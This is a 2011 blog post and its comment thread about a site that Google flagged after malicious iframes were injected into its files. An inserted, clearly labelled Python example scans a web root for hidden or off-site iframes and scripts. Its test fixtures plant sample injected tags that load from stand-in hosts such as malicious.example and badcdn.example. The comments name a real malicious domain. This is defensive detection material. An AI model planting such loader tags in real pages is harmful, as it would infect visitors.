Malware Update
Yesterday people started telling me the site had been flagged by Google for hosting malware, and we found it. It appears to be a database thing not actually related to Drupal since another site on the server running WordPress got hit at the same time, and it only places the bad code in the files intermittently—so when it was gone yesterday I thought it was gone for good. If you actually get infected it will be very obvious. Instructions on how to remove "System Tool" are all over the google, but usually the best course of action is to do a system restore.
We've locked the server down so that nothing should be able to write to the files that were problematic; unfortunately this has the secondary effect of disaggregating all the JavaScript and CSS files. That will make initial loads kind of painful, but it should also get us out of the woods until we can find a better solution.
I'm going to be monitoring this closely the rest of the day, but my body has its own malware—zing!—and I feel miserable so other than watching for iframes like a hawk I am taking a sick day.
A thousand apologies for any trouble this caused people.
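The two defensive steps the post describes, locking the served files down so nothing can write to them and watching the pages for injected iframes, can both be automated. The script below is an added example, not MGoBlog's own code: it walks a web root, flags hidden or off-site `<iframe>` tags and off-site `<script src>` loaders, and lists any files that are still group- or world-writable after a lock-down. The web root layout, the `allowed_hosts` set and the domain names in the sample files are constructed for the demonstration.

```python
"""Scan a web root for injected iframes/scripts and for writable files.

Added example (not the blog's own code). The sample site it builds is
constructed: the domains and file names are placeholders.
"""
import os
import re
import stat
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Tags a compromised site typically serves: a hidden <iframe>, or a
# <script src=...> that pulls code from a host that is not ours.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# width/height of 0 (attribute or CSS), display:none, or visibility:hidden
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*[=:]\s*["']?0(?:px)?["']?(?=[\s>/;"'])"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}


def src_host(src):
    """Hostname an src attribute points at, or '' for a relative/same-site path."""
    src = src.strip()
    if src.startswith("//"):          # scheme-relative URL
        src = "http:" + src
    return urlparse(src).hostname or ""


def find_injections(text, allowed_hosts):
    """Return (kind, tag) findings for one file's contents.

    allowed_hosts: hosts we legitimately embed from (e.g. a video host);
    any other off-site iframe/script host is reported.
    """
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        host = src_host(src.group(1)) if src else ""
        if HIDDEN_RE.search(tag) or (host and host not in allowed_hosts):
            findings.append(("hidden-or-offsite-iframe", tag))
    for m in SCRIPT_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        if src:
            host = src_host(src.group(1))
            if host and host not in allowed_hosts:
                findings.append(("offsite-script", tag))
    return findings


def scan_webroot(root, allowed_hosts):
    """Walk root; return {relative_path: [findings]} for files with suspicious tags."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = find_injections(path.read_text(errors="replace"), allowed_hosts)
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def group_or_world_writable(root):
    """Files under root that are group- or world-writable.

    After a lock-down like the one in the post this should be empty; anything
    listed is a file the web server (or anyone else) could still modify.
    """
    root = Path(root)
    bad = []
    for path in root.rglob("*"):
        if path.is_file() and path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            bad.append(str(path.relative_to(root)))
    return sorted(bad)


def build_sample_site():
    """Constructed web root: a clean page, an infected page, a tampered JS file."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "misc").mkdir()
    (root / "index.html").write_text(
        '<html><body><script src="/misc/jquery.js"></script>'
        '<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>'
        "</body></html>"
    )
    (root / "page.php").write_text(
        "<?php echo 'hello'; ?>\n"
        '<iframe src="http://malicious.example/in.php" width="0" height="0" frameborder="0"></iframe>\n'
    )
    (root / "misc" / "jquery.js").write_text(
        "/* legitimate library code would be here */ var x = 1;\n"
        "document.write('<script src=\"http://badcdn.example/load.js\"><\\/script>');\n"
    )
    os.chmod(root / "index.html", 0o644)
    os.chmod(root / "misc" / "jquery.js", 0o644)
    os.chmod(root / "page.php", 0o666)   # the file that was left writable and got modified
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for f, hits in scan_webroot(site, {"www.youtube.com"}).items():
        for kind, tag in hits:
            print(f"{f}: {kind}: {tag}")
    print("still writable:", group_or_world_writable(site))
```

Run it from cron against the real document root and alert on any non-empty report; legitimate third-party embeds go in `allowed_hosts` so the scan stays quiet on a clean site.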
January 25th, 2011 at 1:40 PM
Does this mean no UV today?
January 25th, 2011 at 6:33 PM
Time for Beveled Guilt, people!
January 25th, 2011 at 1:42 PM
With great power comes great responsibility. I can't even imagine the insane number of emails you got in the last 24 hours. Thanks again for the hard work.
January 25th, 2011 at 1:45 PM
I bet it leads to somewhere in Allegheny County. TGibson I presume???? Hath he no shame! Leave us be demon!
January 25th, 2011 at 1:51 PM
Meaning no more Miss Pac-Man on the Commodore64?
January 25th, 2011 at 2:02 PM
of hours of classic games. In fact, I think we had the red and black joystick shown in that photo.
January 25th, 2011 at 2:13 PM
He took the picture in your house.
January 25th, 2011 at 2:44 PM
January 25th, 2011 at 2:50 PM
strange noises I heard in my house 20 years ago!
January 25th, 2011 at 1:59 PM
and this Blog needed an enema.
January 25th, 2011 at 3:58 PM
With friends like us, who needs enemas?
January 25th, 2011 at 1:59 PM
January 25th, 2011 at 2:01 PM
You can request a review of the site using Google's Webmaster Tools, if you haven't already. It expedites the process of getting the warning removed.
January 25th, 2011 at 2:13 PM
Somehow this is Greg Robinson's fault
January 25th, 2011 at 2:16 PM
January 25th, 2011 at 2:33 PM
I got this malware from another site a month or so ago and did a system restore. It removed the malware, but I started getting a ton of svchost errors, and then internet commercials from WTKA and 97.1 online started playing at all hours of the day/night. Had to leave the thing on mute. It got so bad with svchost errors the PC wouldn't stay up for more than 3 minutes, even in safe mode.
I had to rip the HD out and get a sata cable to pull the data off and load a new copy of the OS.
January 25th, 2011 at 3:00 PM
The only way this happened is if you didn't completely wipe your hard drive. Viruses don't just lurk around in your keyboard waiting to reinfect your system. If you wiped the drive, the viruses are gone.
January 25th, 2011 at 3:31 PM
Not sure what you are talking about. All I said was after the malware attack I did a system restore and my computer's functionality deteriorated over a few weeks. It wouldn't stay up for more than a few minutes. It got so bad I had to reload the OS. Maybe you misunderstood my post.
January 25th, 2011 at 2:33 PM
feel better soon.
January 25th, 2011 at 2:36 PM
we'll tweet ya if the site blows up
January 25th, 2011 at 2:36 PM
I've been wandering in the desert of ESPN and (dare I say it) MLive, just attempting to eke out a little bit of pertinent information. Thanks for your diligence, Brian, and get better.
January 25th, 2011 at 4:31 PM
I still get the attack page screen when I come here on Firefox, so I had to disable that in my options. But now it pops up saying it can't run some protocol the blog runs called, I think, htc, or htp, something like that. Weird.
January 25th, 2011 at 6:06 PM
January 25th, 2011 at 4:32 PM
Is it just coincidence that the main site identified as the culprit by Google starts with osu (osufoyysdf.co.cc)? Or is something more sinister going on? Has cyberwar been declared on us?
January 25th, 2011 at 4:59 PM
January 25th, 2011 at 5:10 PM
Would the malware affect Macs at all? I know I got on mgoblue on my friend's Mac at the time of the outbreak and was wondering if I need to inform him of anything...
January 25th, 2011 at 6:23 PM
This particular malware can't install on a Mac.
January 25th, 2011 at 7:50 PM
Ha yes...mgoblog. My bad
January 25th, 2011 at 5:54 PM
j/k. Thanks Brain for the diligence. Malware can be a b**ch to prevent against with ads, so I commend you.
January 25th, 2011 at 6:14 PM
January 25th, 2011 at 7:24 PM
I just got a virus on my computer, is it from this? (I have no idea since I know nothing about computers.)
January 25th, 2011 at 7:56 PM
Not hit by the main page, but while attempting to open the MGoBoard links in new windows. Got the following warning:
This page may be a forgery or imitation of another website, designed to trick users into sharing personal or financial information. Entering any personal information on this page may result in identity theft or other abuse. You can find out more about phishing here.
I assumed that it was an "old warning," so I told AVG to let me through, then got hit. I just tried again at 7:55pm (after cleaning off my computer), and still got the same message.
January 26th, 2011 at 2:53 PM
If you managed to snag anything from the site, Malwarebytes should remove it. Download it from malwarebytes.org, update, and run a quick scan. You should be good after that.